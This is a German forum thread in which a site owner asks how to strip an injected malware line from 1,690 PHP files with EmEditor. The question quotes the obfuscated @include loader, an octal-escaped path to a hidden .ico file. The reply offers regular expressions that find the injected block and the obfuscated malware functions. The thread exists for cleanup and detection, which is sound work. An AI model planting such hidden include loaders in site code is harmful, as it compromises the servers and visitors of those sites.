Ich versuche, eine Möglichkeit zum Suchen und Ersetzen mit EMEditor und einem regulären Ausdruck zu finden. Ich versuche, dies für das folgende Element anzuwenden:
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
Ich versuche den Code zwischendurch zu ersetzen/löschen
<?php
Und
// ini_set(?display_errors?, 1);
alles dazwischen ist dieses Malware-Skript, das ich aus vielen Dateien herauszuholen versuche.
Ich suche nach einer einfachen Möglichkeit, diese 1690 Dateien zu löschen. Jede Idee wäre sehr hilfreich.
Liebe Grüße, Thomas
Antwort1
Der PHP-RegExpression für alle ähnlichen Zeichenfolgen wäre ...
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
Dies kann weiter vereinfacht werden, funktioniert aber so wie es ist
**Beachten Sie, dass hierdurch alle Vorkommen der fehlerhaften Zeichenfolgen gefunden werden, die mit einem Kommentarblock beginnen, der 5 zufällige Zeichen enthält, die keine Zeilenumbrüche sind, gefolgt von zwei neuen Zeilen, der Zeile @include, 2 weiteren neuen Zeilen und dem passenden Blockkommentarabschluss – unabhängig davon, ob das Dokument auf Windows-, Mac- oder Linux-Computern gespeichert wurde – beachten Sie \r\n (Windows-Computer) und \n\n (Linux- und Mac-Computer).
Ich habe Ihre Zeichenfolgenübereinstimmungen mit dem regulären Ausdruck unter folgender Adresse überprüft: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
Kurzer Hinweis: Um die Malware-Dateien mit zufälligen Zeichenfolgennamen zu finden, die die verschleierten Funktionen enthalten, verwenden Sie den folgenden regulären Ausdruck …
/function...\(\$..\){\$...\=."/
Dadurch sollten die geänderten Dateien aufgespürt und alle weiteren Malware-Dateien derselben Art für die Malware gefunden werden, von der Sie betroffen sind.
Ich wünsche Ihnen einen schönen Tag! Hoffentlich ist dies für jemanden noch nützlich.